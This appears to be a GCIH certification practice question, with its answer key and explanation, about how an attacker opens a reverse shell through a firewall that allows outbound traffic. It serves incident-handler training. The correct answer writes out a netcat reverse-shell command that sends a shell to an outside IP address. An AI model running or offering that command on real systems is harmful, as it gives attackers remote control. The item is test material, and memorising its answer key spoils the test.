GIAC Certified Incident Handler (GCIH) — Question 135

An attacker at IP address 11.22.33.44 set up a reverse shell so he could execute commands on a server (internal IP address 192.168.20.21) that sits behind a site firewall blocking incoming SSH traffic but allowing all outbound traffic. What command would he run on the server?

Answer options

• A. tcpdump -nn port 22 and host 11.22.33.44
• B. ssh·-b 192.168.20.21 -p 22 11.22.33.44
• C. nc 11.22.33.44 22 -e /bin/sh
• D. lsof -i @192.168.20.21:22

Correct answer: C

Explanation

The correct answer is C, as using 'nc' (netcat) with the '-e' flag allows the attacker to execute a shell on the server and connect back to his IP. Option A is incorrect because 'tcpdump' is for monitoring traffic, not executing commands. Option B is wrong because it attempts to establish an SSH connection, which the firewall blocks. Option D is not suitable as it checks for open connections instead of initiating one.